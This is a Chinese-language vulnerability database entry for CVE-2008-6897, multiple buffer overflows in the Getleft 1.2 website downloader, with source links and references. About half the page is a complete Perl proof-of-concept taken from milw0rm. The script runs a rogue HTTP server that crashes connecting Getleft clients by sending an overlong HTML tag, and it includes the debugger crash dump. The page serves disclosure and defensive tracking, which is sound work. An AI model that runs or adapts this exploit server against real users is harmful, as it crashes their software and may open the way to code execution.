Andres_Garcia Getleft HTML标记 多个缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117120 漏洞类型 缓冲区溢出
发布时间 2008-12-23 更新时间 2009-08-06
CVE编号 CVE-2008-6897 CNNVD-ID CNNVD-200908-009
漏洞平台 Multiple CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7564
https://cxsecurity.com/issue/WLB-2009080081
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-009
|漏洞详情
AndresGarciaGetleft1.2中的Getleft.exe中的多个缓冲区溢出漏洞,允许远程攻击者借助以下几种方式,引起拒绝服务攻击(崩溃)或可能执行任意代码:(1)一个过长的HTML标识;(2)一个过长的inembed、img、script标识中的src属性;(3)一个过长的body标识中的后台属性,以及其他未明标识。
|漏洞EXP
#!/usr/bin/perl
#
# Getleft v1.2.0.0 DoS PoC
# Author: Koshi
#
# Application: Getleft v1.2
# Publisher: Andres Garcia ( http://personal1.iddeo.es/andresgarci/getleft/english/index.html )
# Description: Website Downloader, for such things as offline browsing.
# Tested On: Windows XP SP2
#
# Module: Getleft.exe
# eax=00c5f170 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00c5f170
# eip=004863eb esp=0022d9b0 ebp=010b4870 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
#
# Getleft+0x863eb:
# 004863eb 8b06            mov     eax,dword ptr [esi]  ds:0023:00000000=????????
# 
# <embed src=>, <img src=>, <script src=>, <body background=>
# Plenty of other tags will work as well. I'm not so sure about
# code execution, I'll have to try a few other things.
#

use IO::Socket;

my $body = "<a href=\x22/abcd.jpg\x22>" ."A"x1950 ."</a>";
my $resp = "".
	"HTTP/1.1 200 OK\r\n".
	"Server: Apache\r\n".
	"Date: Mon, 22 Dec 2008 21:50:46 GMT\r\n".
	"Content-Type: text/html\r\n".
	"Accept-Ranges: bytes\r\n".
	"Last-Modified: Mon, 22 Dec 2008 21:45:46 GMT\r\n".
	"Content-Length: " .length($body) ."\r\n".
	"Connection: close\r\n\r\n".
	"$body\r\n";

for ($i = 2; $i >= 1; $i--) {

my $sock = new IO::Socket::INET (LocalPort => '80',
				 Proto => 'tcp',
				 Listen => 1,
				 Reuse => 1, );

print "Listening...\n";
my $new_sock = $sock->accept();
print "Connected...\n";
my $sock_addr = recv($new_sock,$msg,190,0);
print "Sending ...\n";
print $new_sock "$resp";
print "Sent!\n";
close($sock);
print "Closed.\r\n\r\n";

}

# milw0rm.com [2008-12-23]
|参考资料

来源:XF
名称:getleft-htmltag-bo(47597)
链接:http://xforce.iss.net/xforce/xfdb/47597
来源:BID
名称:32994
链接:http://www.securityfocus.com/bid/32994
来源:MILW0RM
名称:7564
链接:http://www.milw0rm.com/exploits/7564